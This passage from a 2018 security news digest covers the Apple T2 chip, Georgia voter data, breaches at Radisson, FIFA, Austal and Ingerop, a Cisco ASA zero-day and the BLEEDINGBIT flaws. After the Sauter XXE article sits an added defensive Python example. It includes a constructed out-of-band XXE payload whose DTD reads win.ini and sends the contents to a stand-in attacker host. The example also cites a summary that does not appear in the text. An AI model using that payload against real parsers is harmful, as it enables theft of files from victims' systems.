🤔@BleepinComputer @demonslay335

10:45 AM - Sep 14, 2018

Experts highlighted that RaaS and affiliate programs are growing in the cybercrime underground, attracting an increasing number of wannabe criminals.

Further details, including IoCs, are reported in the analyses published by both companies (Recorded Future and McAfee).

Apple T2 security chip in new MacBooks disconnects Microphone when lid is closed
5.11.2018 securityaffairs

Apple has implemented a new feature to protect the privacy of its MacBooks users aimed at preventing malicious software from spying on them.
The Apple T2 security chip installed in the new series of MacBooks includes a new hardware feature that physically disconnects the built-in microphone when the lid is closed.

The T2 chip is installed in the 2018 MacBook Pro models presented earlier this year, but the microphone disconnect was only disclosed last week.

The feature is implemented in hardware so that no software, including rootkits and code running with kernel privileges, can re-enable the microphone while the lid is closed.

“All Mac portables with the Apple T2 Security Chip feature a hardware disconnect that ensures that the microphone is disabled whenever the lid is closed.” reads the Apple security overview.

“This disconnect is implemented in hardware alone, and therefore prevents any software, even with root or kernel privileges in macOS, and even the software on the T2 chip, from engaging the microphone when the lid is closed. (The camera is not disconnected in hardware because its field of view is completely obstructed with the lid closed.) “

The new feature was presented last week at the Brooklyn Academy of Music in New York.

Some experts are skeptical about the feature because attackers can still spy on MacBook users while they are working with the lid open.

A manual hardware switch that lets users choose when to turn the microphone and camera off would offer stronger protection.


The Apple T2 chip also implements other security features, such as the Secure Enclave coprocessor that provides the foundation for APFS encrypted storage, secure boot, and Touch ID on the Mac.

Kemp Cites Voter Database Hacking Attempt, Gives No Evidence
5.11.2018 securityweek

The office of Secretary of State Brian Kemp, who is also the Republican gubernatorial nominee, said Sunday it is investigating the state Democratic Party in connection with an alleged attempt to hack Georgia's online voter database, which is used to check in voters at polling places in the midterm elections.

The statement offered no evidence for the claim and didn't specify allegations against Georgia Democrats. But it quickly became a last-minute flashpoint in one of the nation's most closely contested governor's races as Tuesday's election loomed.

Democrats viewed the development as more evidence that Kemp's office, which oversees elections, was serving as an extension of his gubernatorial campaign. Republicans, meanwhile, framed it as an instance of Democrats trying to arrange nefarious votes. It's playing out the same day that Kemp will campaign alongside President Donald Trump in Macon.

As he left the White House on Sunday for Georgia, Trump said he hadn't been briefed on the issue and didn't know anything about it.

Kemp's office said federal authorities had been notified. The FBI declined to comment on the matter. A representative for the Department of Homeland Security confirmed the agency had been notified, but it deferred to Georgia officials for details.

Sunday's announcement came as the Coalition for Good Governance, a plaintiff in a lawsuit against Kemp alleging gross negligence in managing the state's elections, cited published reports saying a third party had discovered that Georgia's online registered voter database — which his office manages — is subject to hacking that could alter voters' information or remove them from the registered voter list altogether.

University of Michigan computer scientist Matthew Bernhard reviewed the reported flaw — which the Democratic Party on Saturday asked several computer scientists to review — and told The Associated Press it could have allowed anyone with access to an individual voter's personal information to alter the record of any voter in the system.

The finger-pointing is the latest turn in a campaign whose final weeks have been dominated by charges of voter suppression and countercharges of attempted voter fraud.

Democrat Stacey Abrams, who would become the nation's first black female governor if she wins, has called Kemp "an architect of voter suppression" and says he's used his post as chief elections officer to make it harder for certain voters to cast ballots. Kemp counters that he's following state and federal law and that it's Abrams and her affiliated voting advocacy groups trying to help people, including noncitizens, cast ballots illegally.

The atmosphere has left partisans and good-government advocates alike worrying about the possibility that the losing side will not accept Tuesday's results as legitimate. Polls suggest a tight race.

The accusation is not the first from Kemp accusing outsiders of trying to penetrate his office. Immediately after the 2016 general election, Kemp accused the federal Department of Homeland Security of trying to hack his office's network, an accusation dismissed in mid-2017 by the DHS inspector general as unfounded.

Even before he was running for governor, Kemp faced criticism over Georgia's election system.

Georgia's current centrally managed elections system lacks a verifiable paper trail that can be audited in case of problems. The state is one of just five nationwide that continues to rely exclusively on aged electronic voting machines that computer scientists have long criticized as untrustworthy because they are easily hacked and don't leave a paper trail.

Kemp has previously been accused by election-integrity activists of mismanaging state elections as Georgia's top elections official through poor oversight and in resisting the transparency they say is necessary to instill faith in the process.

In 2015, Kemp's office inadvertently released the Social Security numbers and other identifying information of millions of Georgia voters. His office blamed a clerical error.

His office made headlines again last year after security experts disclosed a gaping security hole that wasn't fixed until six months after it was first reported to election authorities. Personal data was again exposed for Georgia's 6.7 million voters, as were passwords used by county officials to access files.

Kemp's office laid the blame for that breach on Kennesaw State University, which managed the system on Kemp's behalf.

In the voting integrity case, a federal judge last month endorsed the plaintiff's arguments that Kemp has been derelict in his management of the state election system and that it violates voters' constitutional rights with its lack of verifiability and reliability.

Sauter Quickly Patches Flaw in Building Automation Software
3.11.2018 securityweek

A serious vulnerability that allows an attacker to steal files from an affected system has been found by a researcher in a building automation product from Swiss-based Fr. Sauter AG. It took the vendor only 10 days to release a patch.

The impacted product, CASE Suite, is designed for handling building automation projects. ICS-CERT says the software is used worldwide, particularly in the critical manufacturing sector.

Gjoko Krstic, a researcher with industrial cybersecurity firm Applied Risk, found that CASE Suite versions 3.10 and prior are affected by a high severity XML external entity (XXE) vulnerability. According to an advisory published by Applied Risk on Friday, the flaw impacts the CASE Components, CASE Sensors and CASE VAV applications.

The security hole is tracked as CVE-2018-17912 and it has been assigned CVSS scores of 7.5 (ICS-CERT) and 8.6 (Applied Risk).

“The application suffers from an XML External Entity (XXE) vulnerability using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via out-of-band (OOB) attack,” Applied Risk said in its advisory. “The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the XML data file.”

Krstic told SecurityWeek that an attacker can exploit the vulnerability by getting the targeted user to open a specially crafted XML file using a vulnerable version of the CASE Suite software. For instance, the file can be sent via email, and it may not raise too much suspicion as the software includes functionality for saving and opening project or data files with this format.

In another attack scenario, if the attacker already has access to the system, they can place the malicious file anywhere (e.g., the Desktop folder) and it will be automatically loaded when the user browses to that location via the Sauter software. The researcher noted that the application automatically loads XML files found in folders browsed by the user – he described this as dangerous functionality.

Once the malicious XML file is loaded, it allows the attacker to steal any file from the compromised system, including configuration data, personal information, account credentials, and details about the system and the network housing it, Krstic said via email.

The vulnerability can also be exploited to cause the impacted software to enter a denial-of-service (DoS) condition.

It’s not uncommon for researchers to find vulnerabilities in building automation software. However, in this case it took Sauter only 10 days to release a patch after it was informed of the flaw by ICS-CERT on October 15. It often takes vendors hundreds of days to patch security holes in automation products.
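The two Sauter write-ups on this page (the Applied Risk summary near the top of the section and the SecurityWeek piece above) describe the same mechanism: a data file whose DTD declares parameter entities, one of which reads a local file and another of which pushes that content to an attacker-controlled host. The code below is an added example, not Sauter's or Applied Risk's code and not their proof of concept; it shows the shape of such a payload and a loader that refuses any document carrying a DTD before it reaches the real parser. The collaborator host name, the file path and the XML layout are constructed, and the CASE Suite file format is not reproduced.

```python
"""Added example: recognising and refusing DTD-based XXE payloads before an
XML data file is parsed.  Illustrative code, not Sauter's or Applied Risk's;
host names, paths and the XML layout are constructed."""
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

# Constructed data file of the kind the articles describe.  The internal DTD
# subset declares a parameter entity pointing at an attacker-hosted DTD and
# dereferences it.  collaborator.example is a hypothetical attacker host.
MALICIOUS_XML = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http://collaborator.example/evil.dtd">
  %dtd;
]>
<data>placeholder</data>
"""

# What the hosted evil.dtd would contain (constructed).  %file; reads a local
# file; %wrap; builds a second entity whose SYSTEM URL carries that content
# back out in the request (the out-of-band channel).  "&#x25;" is an encoded
# "%" so that a parameter entity declaration can be nested inside another.
EVIL_DTD = b"""<!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM 'http://collaborator.example/?d=%file;'>">
%wrap;
%send;
"""

# Benign project file with no DTD at all.
BENIGN_XML = b"""<?xml version="1.0"?>
<project name="AHU-1"><node id="1" type="sensor"/></project>
"""


def dtd_findings(xml_bytes):
    """List every DTD construct in xml_bytes without resolving anything.

    expat reports the DOCTYPE and each entity declared in the internal subset
    through callbacks; this function only records them.  A data-file format
    has no legitimate need for a DTD, so any finding is grounds for refusal.
    """
    findings = []
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append(f"DOCTYPE {name} system={system_id!r} "
                        f"internal_subset={bool(has_internal_subset)}")

    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        kind = "parameter" if is_parameter else "general"
        where = f"SYSTEM {system_id!r}" if system_id else "internal value"
        findings.append(f"{kind} entity {name}: {where}")

    def on_external_ref(context, base, system_id, public_id):
        findings.append(f"external entity reference to {system_id!r}")
        return 1  # keep parsing; nothing is fetched either way

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError as exc:
        findings.append(f"parse error: {exc}")
    return findings


def parse_data_file(xml_bytes):
    """Hardened loader: refuse any document with DTD constructs, then parse."""
    findings = dtd_findings(xml_bytes)
    if findings:
        raise ValueError("refusing XML with DTD constructs: " + "; ".join(findings))
    return ET.fromstring(xml_bytes)


if __name__ == "__main__":
    for line in dtd_findings(MALICIOUS_XML):
        print("finding:", line)
    print("benign root element:", parse_data_file(BENIGN_XML).tag)
```

Two caveats. Python's expat does not fetch external entities unless told to, so this script is not itself exploitable; the vulnerable behaviour lives in whatever parser the affected application uses, and the fix there is the same: disable DTD processing and external entity resolution rather than trying to sanitise the file. Refusing documents that carry a DTD also closes the denial-of-service angle the advisory mentions, since entity-expansion attacks need entity declarations to exist in the first place.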

Radisson Hotel Group Hit by Data Breach
3.11.2018 securityweek

Radisson Hotel Group this week informed members of its rewards program that their personal information may have been stolen as a result of a breach.

Radisson Hotel Group, formerly known as Carlson Rezidor Hotel Group, is one of the world’s largest hotel groups, with more than 1,400 hotels in 114 countries. Its portfolio includes Radisson Collection, Radisson Blu, Radisson, Radisson RED, Park Plaza, Park Inn by Radisson, Country Inn & Suites by Radisson, and prizeotel hotels.

On October 1, the company discovered that systems handling its Radisson Rewards program were breached and the data of a “small percentage” of members may have been compromised.

While Radisson’s investigation is ongoing, to date it has found no evidence that payment card information, passwords, or travel history have been accessed. The attackers may have obtained names, addresses, email addresses and, in some cases, company names, phone numbers, Radisson Rewards member numbers, and frequent flyer numbers.

Impacted accounts have been identified and are being monitored for any suspicious activity, the firm said.

Affected individuals will be contacted via email, but Radisson has advised customers to be on the lookout for phishing emails that may be launched in the upcoming period as a result of this incident.

“While the ongoing risk to your Radisson Rewards account is low, please monitor your account for any suspicious activity,” Radisson said in a notice posted on its rewards website.

Several major hotel chains suffered data breaches in the past few years. The list includes Hyatt, InterContinental, Huazhu, Hard Rock Hotel & Casino Las Vegas, Trump Hotels, Millennium Hotels & Resorts and Omni Hotels.

Joshua Adam Schulte, ex CIA employee, accused of continuing leaks from prison
3.11.2018 securityaffairs

Federal prosecutors accuse former CIA employee Joshua Adam Schulte of continuing to leak classified national defense materials from prison.
Joshua Adam Schulte (30) was charged in a 13-count indictment in June.

In mid-May, both The New York Times and The Washington Post revealed the name of the alleged source of the Vault 7 leak, the man who passed the secret documents to WikiLeaks. According to his LinkedIn profile, Schulte worked for the NSA for five months in 2010 as a systems engineer; he then joined the CIA as a software engineer and left the agency in November 2016.

Schulte was identified as a suspect a few days after WikiLeaks started publishing the dumps.

Schulte was first arrested for possession of child pornography: in August 2017 he was charged on three counts of receipt, possession and transportation of child pornography.

The man was released in September 2017, but in December he was arrested again for violating the conditions of his release.

Now Joshua Adam Schulte faces new charges in a rewritten indictment filed in Manhattan federal court: he is charged with the unlawful transmission and attempted unlawful transmission of national defense secrets from prison.

“Prosecutors requested a new arraignment on the rewritten indictment which they said outlined “his continued, brazen disclosure of classified information while incarcerated at the Metropolitan Correctional Center.” The center is next to Manhattan federal court.” reported the Associated Press.

“In a letter to Judge Paul A. Crotty, prosecutors said they learned in May that Schulte had distributed search warrant materials that were supposed to remain secret to family members so that they could be distributed to others, including members of the media. They said they also learned that Schulte provided materials containing classified information to his family members as well.”

According to prosecutors, the government became aware that Schulte had been using one or more smuggled cellphones to communicate clandestinely with individuals outside the prison.

“An FBI search found multiple contraband cellphones including at least one with significant encryption, about 13 email and social media accounts and other electronic devices, prosecutors said.” continues the AP.

According to prosecutors, Joshua Adam Schulte sent classified information to third parties, using an encrypted email account to transmit it.

Since October 1, Schulte has been held under more restrictive detention conditions, likely in an isolated part of the correctional center.

FIFA was hacked again, this is the second hack in a year
3.11.2018 securityaffairs

According to The New York Times, FIFA has suffered its second hack in a year; new documents are set to be published on Friday by Football Leaks.
The Fédération Internationale de Football Association (FIFA) is the governing body of association football, futsal, and beach soccer.

FIFA revealed that it was the victim of a new successful phishing campaign that resulted in the exposure of confidential information belonging to the organization.

This is the second time the federation has been hacked in a year; the organization confirmed the incident but did not disclose details of the attack.
The hack occurred in March and, according to the experts, is not related to the previous one, which was carried out by the Russia-linked group Fancy Bears.

In August 2017, Fancy Bears hackers claimed that around 160 football players failed drug tests in 2015, and 25 2010 World Cup players used doping medicines.


This second hack was discovered after Football Leaks received a new collection of internal documents. Football Leaks is the same organization that published the documents obtained in the first hack.

“UEFA officials were targeted in a so-called phishing operation in which third parties fool their targets into giving up password-protected login details, though the organization has been unable to find traces of a hack in its computer systems.” states The New York Times.

“FIFA officials discussed the prospect of a new hack, and more uncomfortable revelations in the news media, on the edges of the FIFA Council meeting last week in Kigali, Rwanda.”

FIFA released the following statement after the announcement of the hack:

“Fifa condemns any attempts to compromise the confidentiality, integrity and availability of data in any organization using unlawful practices.”

The documents were first obtained by the German newsweekly Der Spiegel that shared them with an investigative reporting consortium known as European Investigative Collaborations (EIC).

European Investigative Collaborations announced it will begin publishing the information as soon as tomorrow.

Top Australia Defence company Austal notifies a serious security breach
3.11.2018 securityaffairs

Austal, a top Australian defence firm that also works with the United States Navy, has suffered a serious security breach.
Austal, a top Australian defence contractor that works with the US Navy, has suffered a serious security breach: hackers accessed personnel files, and the company was the subject of an extortion attempt.

Austal reported the data breach to the Australian Securities Exchange (ASX) on Thursday evening, it also notified affected “stakeholders”.

“Austal Limited (ASX:ASB) advised that its Australian business has detected and responded to a breach of the company’s data management systems by an unknown offender.” reads the data breach notification published by the company.

“Austal Australia’s Information Systems and Technology (IS&T) team have restored the security and integrity of the company’s data systems and have implemented, and continues to implement, additional security measures to prevent further breaches. A small number of stakeholders who were potentially directly impacted have been informed.”

The Australian Cyber Security Centre (ACSC) and the Australian Federal Police have launched an investigation into the security breach.

According to the company, the breach has had no impact on ongoing operations; it also pointed out that Austal’s business in the United States was not affected because it runs on a separate IT infrastructure.

Austal claimed that the breach doesn’t expose information affecting national security or the commercial operations of the company.

“No company wants to lose control of its information, but there is no evidence to date to suggest that information affecting national security nor the commercial operations of the company have been stolen: ship design drawings which may be distributed to customers and fabrication sub-contractors or suppliers are neither sensitive nor classified.” continues the notification.

Austal Multi-Role Vessel

Hackers gained access to personnel email addresses and mobile phone numbers; the attackers then purported to offer them for sale online and to “engage in extortion”.

“Following the breach the offender purported to offer certain materials for sale on the internet and engage in extortion. The company has not and will not respond to the extortion attempts.” continues the note.

Australia’s department of defence declared it “can confirm that no compromise of classified or sensitive information or technology has been identified so far.”

Austal has manufactured over 260 vessels for more than 100 operators in its 28-year history; it has also won a contract to build littoral combat ships for the US Navy.

Defence contractors are a prime target for hackers: stolen information can be used in targeted attacks or resold on the cybercrime underground. Recently, experts from the Italian cyber security firm Yoroi uncovered a mysterious hacking campaign aimed at Italian naval industry companies.

Cisco warns of a zero-day DoS flaw that is being actively exploited in attacks
3.11.2018 securityaffairs
Attack  Vulnerability

Security experts from Cisco warn of a zero-day vulnerability that is being actively exploited in attacks in the wild.
The flaw, tracked as CVE-2018-15454, affects the Session Initiation Protocol (SIP) inspection engine of Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD). The flaw could be exploited by a remote attacker to trigger a DoS condition on the vulnerable device.

“A vulnerability in the Session Initiation Protocol (SIP) inspection engine of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload or trigger high CPU, resulting in a denial of service (DoS) condition.” reads the security advisory published by Cisco.

“The vulnerability is due to improper handling of SIP traffic. An attacker could exploit this vulnerability by sending SIP requests designed to specifically trigger this issue at a high rate across an affected device.”

Experts from Cisco discovered the vulnerability while resolving a Cisco TAC support case.

The following products running ASA 9.4 and above, and FTD 6.0 and later, are affected by the vulnerability:

3000 Series Industrial Security Appliance (ISA)
ASA 5500-X Series Next-Generation Firewalls
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
Adaptive Security Virtual Appliance (ASAv)
Firepower 2100 Series Security Appliance
Firepower 4100 Series Security Appliance
Firepower 9300 ASA Security Module
FTD Virtual (FTDv)
Cisco NX-OS Software

At the time of disclosure there was no software update addressing the flaw, but the company provided several mitigation options.

One mitigation is to disable SIP inspection, but this is not feasible in many environments because it interrupts SIP connections.

To disable SIP inspection, configure the following:

ASA Software:
    policy-map global_policy
     class inspection_default
      no inspect sip

FTD Software releases:
    configure inspection sip disable

Another option is to block offending hosts with an access control list (ACL), or alternatively to shun them with the shun <ip_address> command in EXEC mode. In the latter case, note that shuns do not persist across a reboot.

Cisco also suggests filtering traffic whose ‘Sent-by Address’ header is set to the address associated with the bad packets that could crash the security appliance.

The last mitigation Cisco provides is to rate-limit SIP traffic via the Modular Policy Framework (MPF).

Cyber attack exposes sensitive data about a nuclear power plant in France
3.11.2018 securityaffairs

A cyber attack on the French firm Ingerop allowed attackers to access confidential documents related to nuclear power plant plans in France.
The hacker stole more than 65 gigabytes of documents back in June; the huge trove includes nuclear power plant plans and blueprints for prisons and tram networks.

According to the media, some of the stolen data were found on a rented server in Germany.

“Thousands of sensitive documents pertaining to nuclear power plants, prisons and tram networks have been stolen from the servers of a French company in a cyberattack, German and French media have reported Friday.” reported the German website DW.com.

“The data illegally accessed from the French company Ingerop back in June amounted to more than 65 gigabytes, according to reports by German public broadcaster NDR, the daily Süddeutsche Zeitung and French newspaper Le Monde.”

According to an Ingerop spokeswoman quoted by NDR, hackers accessed more than 11,000 files from a dozen projects.

The sensitive documents include detailed information such as the locations of video cameras in a French high-security prison and documents about a planned nuclear-waste dump in northeastern France.

Attackers also stole personal details about more than a thousand Ingerop workers.

Some of the documents were related to France’s oldest nuclear power plant, Fessenheim, which is scheduled to close by 2022 and is located on the border with Germany, reports said.

nuclear power plant Fessenheim

Such data in the wrong hands could expose the plant and the company’s workers to many threats, including terrorist plots.

Top Australia Defence Firm Reports Serious Cyber Breach
2.11.2018 securityweek

A top Australian defence firm with major US Navy contracts has admitted its personnel files were breached and that it was the subject of an extortion attempt.

Austal -- which among other things makes small, quick ships for warfare close to shore -- said its "data management system" had been infiltrated by an "unknown offender".

In a statement, the company claimed that there was "no evidence to date" that "information affecting national security nor the commercial operations of the company have been stolen".

However it said staff email addresses and mobile phone numbers were accessed and the offender purported to offer materials for sale on the internet and "engage in extortion".

"The company has not and will not respond to extortion attempts."

Australia's department of defence said it "can confirm that no compromise of classified or sensitive information or technology has been identified so far."

The company was at pains to point out that the breach hit only its Australian business and did not extend to US projects, because the two computer systems are not linked.

Austal has won a controversial contract to build littoral combat ships for the US Navy.

The military says it does not need all the vessels paid for, but the project has been aggressively championed by powerful members of the US Congress from Alabama, where Austal's US shipyard is located.

Qualys Acquires Container Security Firm Layered Insight
2.11.2018 securityweek

Security and compliance solutions provider Qualys on Tuesday announced the acquisition of Layered Insight, a company that specializes in protecting container-native applications.

Layered Insight was acquired for $12 million. The deal also includes another $4 million that is tied to an earn-out, and $4 million for the employment of key employees through 2019.

Similar to earlier acquisitions made by Qualys, the company will keep Layered Insight’s employees. Co-founders Asif Awan and John Kinsella will join Qualys as CTO of Container Security and VP of Engineering in Container Security, respectively.

Qualys unveiled a new product designed for securing containers across cloud and on-premises deployments in June 2017.

With the acquisition of Layered Insight, the company hopes to further improve its solutions, including with deeper visibility into containers, the ability to detect and prevent breaches during runtime, and extended visibility, compliance and protection for serverless container-as-a-service (CaaS) installations.

Qualys expects to complete integration of Layered Insight technology into its cloud platform by the second quarter of 2019.

“By integrating Layered Insight’s unique technology into the Qualys Container Security App, we will add the ability to provide dynamic analysis of running containers, and automated enforcement of the container environment,” said Philippe Courtot, chairman and CEO of Qualys.

“Layered Insight's unique technology brings transparent orchestration to container security. The ability to instrument images pushes automated deployment deep into the DevOps CI/CD pipeline, thus removing the resistance at deployment. This instrumentation provides real-time visibility into containers at run-time complementing our current capabilities of accessing container images in the build system for vulnerabilities and configuration issues,” Courtot added.

Cisco Warns of Zero-Day Vulnerability in Security Appliances
2.11.2018 securityweek

Cisco informed customers on Wednesday that some of its security appliances are affected by a serious vulnerability that has been actively exploited.

The zero-day flaw, tracked as CVE-2018-15454, is related to the Session Initiation Protocol (SIP) inspection engine used in the company’s Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software.

A remote and unauthenticated attacker can exploit the vulnerability to cause an affected device to reload or consume CPU resources, resulting in a denial-of-service (DoS) condition. The bug, related to how SIP traffic is handled, can be triggered by sending specially crafted SIP requests to the targeted device at a high rate.

Cisco said it became aware of the vulnerability during the resolution of a technical assistance center (TAC) support case.

The flaw impacts ASA software version 9.4 and later and FTD software version 6.0 and later if SIP inspection is enabled – the feature is enabled by default. The list of affected products includes 3000 Series Industrial Security Appliance (ISA); ASA Virtual; ASA 5500-X firewall; ASA service modules for Catalyst 6500 and 7600 switches and routers; Firepower 2100, 4100 and 9300; and FTD Virtual.

No patches or workarounds are available at this time, but attacks can be mitigated by blocking hosts that launch attacks, disabling SIP inspection, and filtering out traffic with a “Sent-by Address” set to the specific address Cisco identifies, which it says has been used in many of the attacks it spotted.

As for indicators of compromise (IoC), Cisco noted that the show conn port 5060 command will show a large number of incomplete SIP connections if the vulnerability is being exploited. Furthermore, the show process cpu-usage non-zero sorted command will indicate high CPU usage.

“Successful exploitation of this vulnerability can also result in the affected device crashing and reloading. After the device boots up again, the output of show crashinfo will show an unknown abort of the DATAPATH thread. Customer should reach out to Cisco TAC with this information to determine whether the particular crash was related to exploitation of this vulnerability,” Cisco said.

Zero-day vulnerabilities in Cisco products are not very common. In the past two years, the company addressed two such flaws: one leaked by Shadow Brokers from the NSA-linked Equation Group, and one made public by WikiLeaks after it had been stolen from the CIA.

There were also at least two campaigns this year that exploited Cisco ASA vulnerabilities shortly after they were patched.

Google Boosts Account Security With New Tools, Protections
2.11.2018 securityweek

Google on Wednesday announced several new tools and protection mechanisms designed to help users secure their accounts and recover them in case they have been compromised.

It’s not uncommon for accounts to get hacked after their username and password have been obtained by malicious actors through phishing attacks. Since many users still haven’t enabled two-factor authentication, Google has introduced an additional layer of security during the login process.

When the username and password are entered on the sign-in page, a risk assessment is run and the login is only successful if nothing is suspicious. However, for the risk assessment to work, Google says users need to have JavaScript enabled.

The tech giant pointed out that JavaScript is enabled by default in most web browsers, but noted that 0.1% of its customers have decided to disable it. If JavaScript is disabled and the risk assessment cannot be completed, authentication will fail.

Google requires users to enable JavaScript when accessing their account

Once users have logged in, the Security Checkup tool introduced by Google last year helps them improve the security of their account by offering customized guidance. The tool is constantly enhanced and the company recently added protection against harmful mobile apps based on recommendations from Google Play Protect. It now also allows users to remove their account from devices they no longer use.

While Google currently notifies users when third-party sites or apps are given access to Gmail and Google Contacts data, the company says it will soon add Google Accounts to the list.

In case an account has been compromised, Google now provides a step-by-step process that helps users check security settings, protect other accounts linked to the hacked account, verify financial activity to see if payment methods linked to the account have been abused, and review files in Gmail and Drive to determine if they have been accessed or misused.

Law Enforcement Faces Dilemma in Assessing Online Threats
2.11.2018 securityweek

Their anger is all over social media for the whole world to see, with rants about minorities, relationships gone bad or paranoid delusions about perceived slights.

The perpetrators of mass shootings often provide a treasure trove of insight into their violent tendencies, but the information is not always seen by law enforcement until after the violence is carried out. In addition, rants and hate speech rarely factor into whether someone passes a background check to buy guns.

The massacre at a Pittsburgh synagogue, the pipe bombing attempts from last week and the Florida high school shooting this year have underscored the dilemma of law enforcement around the country in assessing the risk of people making online rants at a time when social media has become so ubiquitous.

"We can go out on Twitter and there are loads of people saying insane stuff, but how do you know which is the one person? It's always easy after the fact, to go: 'That was clear.' But clearly everyone spouting their mouth doesn't go and shoot up a synagogue," said David Chipman, a retired agent of the federal Bureau of Alcohol, Tobacco, Firearms and Explosives and now senior policy adviser for the Giffords Center.

Robert Bowers, the man accused of opening fire at a synagogue in Pittsburgh, expressed virulently anti-Semitic views on a social media site called Gab, according to an Associated Press review of an archived version of the posts made under his name. The cover photo for his account featured a neo-Nazi symbol, and his recent posts included a photo of a fiery oven like those used in Nazi concentration camps during World War II. Other posts referenced false conspiracy theories suggesting the Holocaust was a hoax.

It was only just before the shooting that the poster believed to be Bowers seemed to cross the line, posting: "I can't sit by and watch my people get slaughtered. Screw your optics, I'm going in." Authorities say Bowers killed 11 people and injured six others, including four officers who responded.

Keeping tabs on social media posts has been used for years by law enforcement to try to identify potential threats. The task is enormous and it's an inexact science. The volume of posts is significant and the question arises: Is something a true threat or free speech?

They are mindful of the fact that the First Amendment protects Americans' right to express even speech that many in society find abhorrent — and have to make often-subjective decisions about what crosses the line.

Among more than 550 police departments across the country surveyed several years ago by the International Association of Chiefs of Police, about three-quarters said they regularly searched social media for potential threats.

Lt. Chris Cook, spokesman for the Arlington, Texas, Police Department, said the searches are often done manually, using keywords to try to identify troubling posts.

"It's very time consuming, it's very staff and resource intensive and you have humans involved in the process so there is the potential that law enforcement can miss something," Cook said, adding that departments can't rely on social media alone. The community needs to be involved to report any suspicious behavior.

"Everyone has to be our extra eyes and ears out there," he said.

In one case where vigilance paid off, authorities say a black woman received troubling racist, harassing messages on Facebook from a man she didn't know, prompting her to call police. The tip from the New Jersey woman led Kentucky police to a home where they found Dylan Jarrell with a firearm, more than 200 rounds of ammunition, a bulletproof vest, a 100-round high-capacity magazine and a "detailed plan of attack." He was arrested just as he was leaving his driveway.

Bowers is not alone among alleged mass shooters in making racist or bigoted comments online.

Dylann Roof, convicted of the 2015 slaying of nine black churchgoers in South Carolina, had posted a 2,000-word racist rant and posed in photos with firearms and the Confederate flag. Nikolas Cruz, the teenager charged in the slaying of 17 students and adults at a high school in Parkland, Florida, hurled online slurs against blacks and Muslims, and went so far as to state he wanted to be a "professional school shooter."

The rants did not affect their ability to buy guns. When purchasing a firearm, criminal background checks only look for any records showing a criminal past or mental health problems that led to an involuntary commitment.

"I always felt as an ATF agent, the way our laws were structured, ATF stood for 'After the Fact'," Chipman said.

There have been some changes, however, to make it easier to alert authorities to warning signs. "Red flag" laws have been enacted in 13 states in the past couple of years, allowing relatives or law enforcement with concerns about a person's mental health to go to court and seek to have firearms removed at least temporarily.

But Erich Pratt, executive director of Gun Owners of America, cautioned against using social media content to deny someone the constitutional right to own a firearm.

"I abhor hateful comments by the left or the right but I don't think you lose your rights for simply uttering," Pratt said.

He likened it to the Tom Cruise movie "Minority Report," about law enforcement in the future using psychic technology to nab murderers before they commit a crime.

"It's dangerous to go down this road of Minority Report with pre-crime," he said. "Nobody should lose their rights without due process."

Bluetooth Chip Flaws Expose Enterprises to Remote Attacks
2.11.2018 securityweek
Exploit  Vulnerability

Millions of access points and other networking devices used by enterprises around the world may be exposed to remote attacks due to a couple of vulnerabilities discovered by researchers in Bluetooth Low Energy (BLE) chips made by Texas Instruments.

Bluetooth Low Energy, or Bluetooth 4.0, is designed for applications that do not require exchanging large amounts of data, such as smart home, health and sports devices. BLE stays in sleep mode and is only activated when a connection is initiated, which results in low power consumption. Like classic Bluetooth, BLE works over distances of up to 100 meters (330 feet), but its data transfer rate is typically 1 Mbit/s, compared to 1-3 Mbit/s for classic Bluetooth.

Researchers at IoT security company Armis, who in the past discovered the Bluetooth vulnerabilities known as BlueBorne, now claim to have found two serious vulnerabilities in BLE chips made by Texas Instruments. These chips are used in access points and other enterprise networking devices made by Cisco, including Meraki products, and HP-owned Aruba Networks.

According to Armis, these vendors provide 70% of the wireless access points sold to enterprises every year, but it’s unclear exactly how many devices are vulnerable.

The flaws, dubbed BLEEDINGBIT by Armis, can allow a remote and unauthenticated attacker to take complete control of impacted devices and gain access to the enterprise networks housing them.

Devices used in the healthcare sector, such as insulin pumps and pacemakers, also use the affected BLE chips so they could be vulnerable to BLEEDINGBIT attacks as well.

The IoT security firm is in the process of assessing the full impact of the BLEEDINGBIT vulnerabilities, but so far it has determined that they affect several Texas Instruments chips. One of the flaws, tracked as CVE-2018-16986, has been found in CC2640 and CC2650 chips running BLE-STACK 2.2.1 and earlier, and in CC2640R2 running version 1.0 or earlier.

The bug is present in several Cisco Aironet and Meraki MR access points. However, exploitation is only possible if the device is actively scanning.

The second flaw, CVE-2018-7080, is present in CC2642R2, CC2640R2, CC2640, CC2650, CC2540 and CC2541 chips. However, the security hole can only be exploited if the device using the chip has the over-the-air firmware download (OAD) feature enabled. So far, only some APs from Aruba have been found to use this feature.

The first vulnerability can be exploited for remote code execution by an attacker who is in range of the targeted device. If BLE is turned on and the device is actively scanning, a malicious actor can send specially crafted packets in order to trigger a memory overflow and execute arbitrary code.

The attacker can install a backdoor on the chip and then gain complete control of the system. In the case of access points, the attacker can use the compromised AP to spread to other devices on the network, even if segmentation is in place.

The second bug, which to date has only been found to affect Aruba devices, allows an attacker to deliver a malicious update to the targeted AP and rewrite its operating system. The attacker can then gain complete control of the device.

This attack is made easier by the fact that all Aruba access points share the same OAD password, which can be obtained by intercepting a legitimate update or reverse engineering the device. However, Aruba pointed out that the exploit only works if the BLE radio has been enabled – the feature is disabled by default.

Attacks can be conducted from up to 100 meters, but Armis told SecurityWeek that the distance can be doubled or even tripled if the attacker uses a directional antenna. Once the AP has been compromised, the attacker can create an outbound connection over the Internet and they no longer need to stay in range. Armis says the attacks can be carried out in 1-2 minutes.

